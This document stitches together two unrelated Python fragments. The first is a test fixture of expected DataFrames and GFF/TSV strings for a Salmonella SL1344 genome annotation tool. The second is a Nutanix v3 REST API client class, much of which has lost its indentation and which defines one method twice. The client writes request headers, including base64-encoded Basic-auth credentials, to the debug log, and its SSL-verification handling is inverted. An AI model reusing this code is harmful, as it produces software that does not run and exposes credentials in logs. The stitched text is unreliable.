"EMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051799"
"41.1;Parent=gene5;gbkey=CDS;product=thr operon leader peptide;"
"protein_id=YP_005179941.1;transl_table=11\n"
)
written_tsv = (
"seq_id\tsource\ttype\tstart\tend\tscore\tstrand\tphase\t"
"attributes\n"
"NC_016810.1\tRefSeq\tregion\t1\t4000\t.\t+\t.\tDbxref=taxon:21"
"6597;ID=id0;gbkey=Src;genome=genomic;mol_type=genomic DNA;"
"serovar=Typhimurium;strain=SL1344\n"
"NC_016810.1\tRefSeq\tgene\t1\t20\t.\t+\t.\tID=gene1;Name=thrL;"
"gbkey=Gene;gene=thrL;locus_tag=SL1344_0001\n"
"NC_016810.1\tRefSeq\tCDS\t13\t235\t.\t+\t0\tDbxref=UniProtKB%2"
"52FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051"
"79941.1;Parent=gene1;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t1\t20\t.\t+\t.\tID=gene2;Name=thrA;"
"gbkey=Gene;gene=thrA;locus_tag=SL1344_0002\n"
"NC_016810.1\tRefSeq\tCDS\t341\t523\t.\t+\t0\tDbxref=UniProtKB%"
"252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_005"
"179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t1\t600\t.\t-\t.\tID=gene3;Name=thrX"
";gbkey=Gene;gene=thrX;locus_tag=SL1344_0003\n"
"NC_016810.1\tRefSeq\tCDS\t21\t345\t.\t-\t0\tDbxref=UniProtKB%2"
"52FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051"
"79941.1;Parent=gene3;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t41\t255\t.\t+\t.\tID=gene4;Name="
"thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004\n"
"NC_016810.1\tRefSeq\tCDS\t61\t195\t.\t+\t0\tDbxref=UniProtKB%2"
"52FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name=YP_0051"
"79941.1;Parent=gene4;gbkey=CDS;product=thr operon leader "
"peptide;protein_id=YP_005179941.1;transl_table=11\n"
"NC_016810.1\tRefSeq\tgene\t170\t546\t.\t+\t.\tID=gene5;Name="
"thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005\n"
"NC_016810.1\tRefSeq\tCDS\t34\t335\t.\t+\t0\tDbxref=UniProt"
"KB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name="
"YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon "
"leader peptide;protein_id=YP_005179941.1;transl_table=11\n"
)
written_gff = (
"##gff-version 3\n"
"##sequence-region NC_016810.1 1 20\n"
"NC_016810.1 RefSeq region 1 4000 . +"
" . Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=ge"
"nomic;mol_type=genomic DNA;serovar=Typhimurium;strain=SL1344\n"
"NC_016810.1 RefSeq gene 1 20 . +"
" . ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_"
"tag=SL1344_0001\n"
"NC_016810.1 RefSeq CDS 13 235 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene1;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 1 20 . +"
" . ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_"
"tag=SL1344_0002\n"
"NC_016810.1 RefSeq CDS 341 523 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene2;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 1 600 . -"
" . ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_"
"tag=SL1344_0003\n"
"NC_016810.1 RefSeq CDS 21 345 . -"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene3;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 41 255 . +"
" . ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_"
"tag=SL1344_0004\n"
"NC_016810.1 RefSeq CDS 61 195 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene4;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
"NC_016810.1 RefSeq gene 170 546 . +"
" . ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_"
"tag=SL1344_0005\n"
"NC_016810.1 RefSeq CDS 34 335 . +"
" 0 Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:Y"
"P_005179941.1;ID=cds0;Name=YP_005179941.1;Parent=gene5;gbkey=C"
"DS;product=thr operon leader peptide;protein_id=YP_005179941.1"
";transl_table=11\n"
)
# Expected result of filtering the annotation by feature length; the
# original row indices of the surviving rows are preserved.
written_filtered_length = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            13,
            235,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            341,
            523,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            41,
            255,
            ".",
            "+",
            ".",
            "ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            61,
            195,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[1, 2, 3, 4, 7, 8],
)
# Expected result of selecting features by an attribute value: all five
# 'gene' rows, with their original row indices preserved.
compare_get_feature_by_attribute = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            600,
            ".",
            "-",
            ".",
            "ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            41,
            255,
            ".",
            "+",
            ".",
            "ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            170,
            546,
            ".",
            "+",
            ".",
            "ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[1, 3, 5, 7, 9],
)
# Expected result of a second attribute lookup: a subset of the CDS rows,
# again with original indices preserved.
compare_get_feature_by_attribute2 = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            341,
            523,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            21,
            345,
            ".",
            "-",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            61,
            195,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID="
            "cds0;Name=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon"
            " leader peptide;protein_id=YP_005179941.1;transl_table=11",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[4, 6, 8],
)
# Expected result of splitting the attributes column into one column per
# attribute key; rows that lack a given key carry None in that column.
written_attribute_df = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "region",
            1,
            4000,
            ".",
            "+",
            ".",
            "Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=genomic;mol_type=genomic"
            " DNA;serovar=Typhimurium;strain=SL1344",
            "taxon:216597",
            "id0",
            None,
            None,
            "Src",
            None,
            "genomic",
            None,
            "genomic DNA",
            None,
            None,
            "Typhimurium",
            "SL1344",
            None,
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
            None,
            "gene1",
            "thrL",
            None,
            "Gene",
            "thrL",
            None,
            "SL1344_0001",
            None,
            None,
            None,
            None,
            None,
            None,
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            13,
            235,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
            "Name=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon leader"
            " peptide;protein_id=YP_005179941.1;transl_table=11",
            "UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
            "cds0",
            "YP_005179941.1",
            "gene1",
            "CDS",
            None,
            None,
            None,
            None,
            "thr operon leader peptide",
            "YP_005179941.1",
            None,
            None,
            "11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
            None,
            "gene2",
            "thrA",
            None,
            "Gene",
            "thrA",
            None,
            "SL1344_0002",
            None,
            None,
            None,
            None,
            None,
            None,
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            341,
            523,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
            "Name=YP_005179941.1;Parent=gene2;gbkey=CDS;product=thr operon leader"
            " peptide;protein_id=YP_005179941.1;transl_table=11",
            "UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
            "cds0",
            "YP_005179941.1",
            "gene2",
            "CDS",
            None,
            None,
            None,
            None,
            "thr operon leader peptide",
            "YP_005179941.1",
            None,
            None,
            "11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            600,
            ".",
            "-",
            ".",
            "ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
            None,
            "gene3",
            "thrX",
            None,
            "Gene",
            "thrX",
            None,
            "SL1344_0003",
            None,
            None,
            None,
            None,
            None,
            None,
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            21,
            345,
            ".",
            "-",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
            "Name=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon leader"
            " peptide;protein_id=YP_005179941.1;transl_table=11",
            "UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
            "cds0",
            "YP_005179941.1",
            "gene3",
            "CDS",
            None,
            None,
            None,
            None,
            "thr operon leader peptide",
            "YP_005179941.1",
            None,
            None,
            "11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            41,
            255,
            ".",
            "+",
            ".",
            "ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
            None,
            "gene4",
            "thrB",
            None,
            "Gene",
            "thrB",
            None,
            "SL1344_0004",
            None,
            None,
            None,
            None,
            None,
            None,
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            61,
            195,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
            "Name=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon leader"
            " peptide;protein_id=YP_005179941.1;transl_table=11",
            "UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
            "cds0",
            "YP_005179941.1",
            "gene4",
            "CDS",
            None,
            None,
            None,
            None,
            "thr operon leader peptide",
            "YP_005179941.1",
            None,
            None,
            "11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            170,
            546,
            ".",
            "+",
            ".",
            "ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
            None,
            "gene5",
            "thrC",
            None,
            "Gene",
            "thrC",
            None,
            "SL1344_0005",
            None,
            None,
            None,
            None,
            None,
            None,
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            34,
            335,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;"
            "Name=YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon leader"
            " peptide;protein_id=YP_005179941.1;transl_table=11",
            "UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1",
            "cds0",
            "YP_005179941.1",
            "gene5",
            "CDS",
            None,
            None,
            None,
            None,
            "thr operon leader peptide",
            "YP_005179941.1",
            None,
            None,
            "11",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
        "Dbxref",
        "ID",
        "Name",
        "Parent",
        "gbkey",
        "gene",
        "genome",
        "locus_tag",
        "mol_type",
        "product",
        "protein_id",
        "serovar",
        "strain",
        "transl_table",
    ],
)
# Use the Series.value_counts method: the top-level pd.value_counts helper
# was deprecated in pandas 1.5 and removed in pandas 2.0.
strand_counts = written_df["strand"].value_counts().to_dict()
type_counts = written_df["type"].value_counts().to_dict()
# Expected output of the stats helper for the test annotation above.
compare_stats_dic = {
    "Maximal_bp_length": 599,
    "Minimal_bp_length": 19,
    "Counted_strands": strand_counts,
    "Counted_feature_types": type_counts,
}
# An annotation DataFrame with the standard columns but no rows, for
# testing behavior on empty input.
df_empty = pd.DataFrame(
    {},
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[],
)
# A single duplicated row (same attributes as the gene2 entry) used for
# redundancy/deduplication tests; index matches its position in written_df.
redundant_entry = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[3],
)
# Expected result of filtering the annotation to 'gene' features only.
compare_filter_feature_df = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            600,
            ".",
            "-",
            ".",
            "ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            41,
            255,
            ".",
            "+",
            ".",
            "ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            170,
            546,
            ".",
            "+",
            ".",
            "ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[1, 3, 5, 7, 9],
)
# Expected 'gene' features overlapping positions 1-40.
compare_overlap_gene_1_40 = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene1;Name=thrL;gbkey=Gene;gene=thrL;locus_tag=SL1344_0001",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            1,
            20,
            ".",
            "+",
            ".",
            "ID=gene2;Name=thrA;gbkey=Gene;gene=thrA;locus_tag=SL1344_0002",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[1, 3],
)
# Expected features overlapping positions 40-300 (any type, + strand side).
compare_overlap_40_300 = pd.DataFrame(
    [
        [
            "NC_016810.1",
            "RefSeq",
            "region",
            1,
            4000,
            ".",
            "+",
            ".",
            "Dbxref=taxon:216597;ID=id0;gbkey=Src;genome=genomic;mol_type=genomic DNA"
            ";serovar=Typhimurium;strain=SL1344",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            13,
            235,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene1;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            41,
            255,
            ".",
            "+",
            ".",
            "ID=gene4;Name=thrB;gbkey=Gene;gene=thrB;locus_tag=SL1344_0004",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            61,
            195,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene4;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "gene",
            170,
            546,
            ".",
            "+",
            ".",
            "ID=gene5;Name=thrC;gbkey=Gene;gene=thrC;locus_tag=SL1344_0005",
        ],
        [
            "NC_016810.1",
            "RefSeq",
            "CDS",
            34,
            335,
            ".",
            "+",
            "0",
            "Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
            "=YP_005179941.1;Parent=gene5;gbkey=CDS;product=thr operon leader peptide"
            ";protein_id=YP_005179941.1;transl_table=11",
        ],
    ],
    columns=[
        "seq_id",
        "source",
        "type",
        "start",
        "end",
        "score",
        "strand",
        "phase",
        "attributes",
    ],
    index=[0, 2, 7, 8, 9, 10],
)
compare_overlap_170_171 = pd.DataFrame(
[
[
"NC_016810.1",
"RefSeq",
"gene",
1,
600,
".",
"-",
".",
"ID=gene3;Name=thrX;gbkey=Gene;gene=thrX;locus_tag=SL1344_0003",
],
[
"NC_016810.1",
"RefSeq",
"CDS",
21,
345,
".",
"-",
"0",
"Dbxref=UniProtKB%252FTrEMBL:E1W7M4%2CGenbank:YP_005179941.1;ID=cds0;Name"
"=YP_005179941.1;Parent=gene3;gbkey=CDS;product=thr operon leader peptide"
";protein_id=YP_005179941.1;transl_table=11",
],
],
| |
import json
import os
import urllib3
import time
urllib3.disable_warnings() #for now
import requests #https://requests.readthedocs.io/en/master/
from base64 import b64encode
import logging
from jinja2 import Template
import humanfriendly
from urllib.parse import urlparse
from urllib.parse import urlencode
class NutanixAPI:
def __init__(self,url,username,password,log_file,log_level,ssl_verify=True,max_results=99999):
"""
Creates Nutanix API object
Args:
url ([string]): URL of API en dpoint
username (string): username
password ([string]): password
log_file ([string]): logfile , where operations is logged
log_level ([type]): logging.DEBUG/logging.WARNING/logging.INFO,
ssl_verify (bool, optional): SSL verification. Defaults to True. #not implemented properly
max_results (int, optional): maximum number of returned results. Defaults to 99999.
"""
# Initialise the options.
self.url = url
self.username = username.replace('\n', '')
self.password = password.replace('\n', '')
self.ssl_verify=ssl_verify
self.max_results=99999
logging.basicConfig(filename=log_file,level=log_level,format='%(asctime)s %(message)s')
if(self.ssl_verify==True):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Create a REST client session.
def rest_call(self, method, sub_url, data=None):
    """
    Issue a single REST request against the Nutanix v3 API.

    Args:
        method (string): HTTP verb; one of GET, POST, PUT
        sub_url (string): path below /api/nutanix/v3/, e.g. 'vms/list'
        data (dict, optional): JSON body for POST/PUT requests
    Returns:
        requests.Response on success, None when the request could not be sent
    Raises:
        ValueError: for unsupported HTTP methods
    """
    req_url = f'{self.url}/api/nutanix/v3/{sub_url}'
    verb = method.upper()
    # BUG FIX: previously the ValueError for unsupported verbs was raised
    # inside the try block, swallowed by a BaseException handler, and the
    # subsequent `return response` raised NameError. Validate up front.
    if verb not in {"GET", "POST", "PUT"}:
        raise ValueError("Unsupported method")  # other verbs may be implemented later
    # Basic-auth header built by hand; the same code path serves all verbs.
    encoded_credentials = b64encode(bytes(f'{self.username}:{self.password}', encoding='ascii')).decode('ascii')
    headers = {
        "Authorization": f'Basic {encoded_credentials}',
        "Content-Type": "application/json",
        "Accept": "application/json",
        "cache-control": "no-cache",
    }
    encoded_data = None
    if verb in {"POST", "PUT"}:  # these verbs carry a JSON body
        encoded_data = json.dumps(data).encode('utf-8')
    logging.debug("rest_call %s url: %s", verb, req_url)
    logging.debug("rest_call headers: %s", headers)
    if encoded_data is not None:
        logging.debug("rest_call data: %s", encoded_data)
    response = None  # BUG FIX: previously unbound when the request raised early
    try:
        response = requests.request(verb, req_url, data=encoded_data, headers=headers, verify=self.ssl_verify)
        logging.debug(f"rest_call response status code {response.status_code}")
        try:
            logging.debug("rest_call response: %s", response.json())
        except ValueError:  # body was not JSON; keep the response anyway
            logging.debug("rest_call response was not valid JSON")
    except requests.exceptions.RequestException as ex:
        # Preserve the original best-effort behavior: report and return None.
        print(repr(ex))
    return response
def _get_templ_path(self,template_dir,template_name):
full_path=os.path.join(template_dir,template_name)
return full_path
def _read_file(self,path):
"""
Read a cloud-init template from file.
Args:
path (String): path to the file
"""
with open(path, 'r') as content_file:
content = content_file.read()
return content
def _write_file(self,path,data):
"""
Write data to a file
use in debugging
Args:
path (String): path to the file
data (String): data to save in file
"""
with open(path, 'w') as f:
f.write(data)
def _prepare_user_data_managed(self, template_dir, network_cfg):
    """
    Render the cloud-init template for VMs on Nutanix-managed networks and
    return it base64-encoded for the VM-creation payload.

    Args:
        template_dir (String): directory holding the cloud-init templates
        network_cfg: unused here — addressing is handled by the managed
            network (DHCP / Nutanix-assigned IP). Kept for signature
            symmetry with _prepare_user_data_unmanaged. (Also fixes the
            previous parameter-name typo 'nework_cfg'.)
    Returns:
        String: base64-encoded cloud-init user data
    """
    cloud_init_file = self._read_file(self._get_templ_path(template_dir, "cloud-init.yaml.j2"))
    t_ci = Template(cloud_init_file)
    rendered_template = t_ci.render()
    #self._write_file("c:\\temp\\user_data.yaml",rendered_template)
    user_data = b64encode(rendered_template.encode()).decode('ascii')
    logging.debug(f"UserData:{user_data}")
    return user_data
def _prepare_user_data_unmanaged(self, template_dir, net_cfg):
    """
    Gets network configuration as a dictionary and creates a cloud-init file
    which generates proper configuration and encodes it for use in vm
    creation in unmanaged networks.

    Args:
        template_dir (String): directory holding the cloud-init templates
        net_cfg (Dict): Network configuration
            {
                ip_address
                prefix
                default_gw
                dns_server1
                dns_server2
                dns_search
            }
    Returns:
        String: base64-encoded cloud-init user data
    """
    # Two templates: the outer cloud-init document and the inner netplan-style
    # static network config that is embedded into it base64-encoded.
    cloud_init_file=self._read_file(self._get_templ_path(template_dir,"cloud-init-net.yaml.j2"))
    net_tmpl_file=self._read_file(self._get_templ_path(template_dir,"static.yaml.j2"))
    t_net=Template(net_tmpl_file) #create jinja templates
    rendered_net_template=t_net.render(
        ip_address=net_cfg['ip_address'],
        prefix=net_cfg['prefix'],
        default_gw=net_cfg['default_gw'],
        dns_server1=net_cfg['dns_server1'],
        dns_server2=net_cfg['dns_server2'],
        dns_search=net_cfg['dns_search']
    )
    #self._write_file("c:\\temp\\network_cfg.yaml",rendered_net_template)
    # Embed the rendered network config into the outer template as base64.
    rendered_net_template_b64=b64encode(rendered_net_template.encode())
    t_ci=Template(cloud_init_file)
    b64_str=rendered_net_template_b64.decode('ascii')
    rendered_ci_template=t_ci.render(netplan_content=b64_str)
    #self._write_file("c:\\temp\\user_data.yaml",rendered_ci_template)
    # The whole cloud-init document is itself base64-encoded for the API payload.
    user_data=b64encode(rendered_ci_template.encode()).decode('ascii')
    logging.debug(f"UserData:{user_data}")
    return user_data
def list_clusters_screen(self):
    """Fetch all clusters and print their basic attributes to stdout."""
    payload = {"kind": "cluster", "length": self.max_results}
    resp = self.rest_call('POST', 'clusters/list', payload)
    if resp.status_code == 200:
        self._print_entities(resp)
def list_clusters(self):
    """Return the raw clusters/list response, or None when the call fails.

    NOTE(review): this method is shadowed by a second ``list_clusters``
    definition later in the class, so this version is never the one bound
    at runtime — confirm which behavior is intended.
    """
    data={
        "kind":"cluster",
        "length":self.max_results
    }
    response=self.rest_call('POST','clusters/list',data)
    if response.status_code == 200:
        return(response)
def list_images_screen(self):
    """Fetch all images and print their basic attributes to stdout."""
    payload = {"kind": "image", "length": self.max_results}
    resp = self.rest_call('POST', 'images/list', payload)
    if resp.status_code == 200:
        self._print_entities(resp)
def list_images(self):
data={
"kind":"image",
"length":self.max_results
}
response=self.rest_call('POST','images/list',data)
if response.status_code == 200:
return(response)
def get_image_uuid(self,image_name):
data={
"kind":"image",
"length":self.max_results
}
response=self.rest_call('POST','images/list',data)
return self._get_uuid_by_name(response,image_name) if response.status_code == 200 else False
def list_subnets(self):
data={
"kind":"subnet",
"length":self.max_results
}
response=self.rest_call('POST','subnets/list',data)
if response.status_code == 200:
return(response)
def list_subnets_screen(self):
    """Fetch all subnets and print their basic attributes to stdout."""
    payload = {"kind": "subnet", "length": self.max_results}
    resp = self.rest_call('POST', 'subnets/list', payload)
    if resp.status_code == 200:
        self._print_entities(resp)
def get_subnet_uuid(self,subnet_name):
data={
"kind":"subnet",
"length":self.max_results
}
response=self.rest_call('POST','subnets/list',data)
return self._get_uuid_by_name(response,subnet_name) if response.status_code == 200 else False
def list_clusters(self):
data={
"kind":"cluster",
"length":self.max_results
}
response=self.rest_call('POST','clusters/list',data)
if response.status_code == 200:
self._print_entities(response)
def list_vms_screen(self):
    """Fetch all VMs and print their basic attributes to stdout."""
    payload = {"kind": "vm", "length": self.max_results}
    resp = self.rest_call('POST', 'vms/list', payload)
    if resp.status_code == 200:
        self._print_entities(resp)
def list_vms(self):
data={
"kind":"vm",
"length":self.max_results
}
response=self.rest_call('POST','vms/list',data)
if response.status_code == 200:
result_json = json.loads(response.content)
return(result_json)
def list_projects(self):
data={
"kind":"project",
"length":self.max_results
}
response=self.rest_call('POST','projects/list',data)
if response.status_code == 200:
return(response)
def list_projects_screen(self):
    """Fetch all projects and print their basic attributes to stdout."""
    payload = {"kind": "project", "length": self.max_results}
    resp = self.rest_call('POST', 'projects/list', payload)
    if resp.status_code == 200:
        self._print_entities(resp)
def get_current_user_uuid(self):
"""
return uuid of current user in nutanix API
"""
response=self.rest_call('GET','users/me')
if response.status_code == 200 or response.status_code == 202:
result_json = json.loads(response.content)
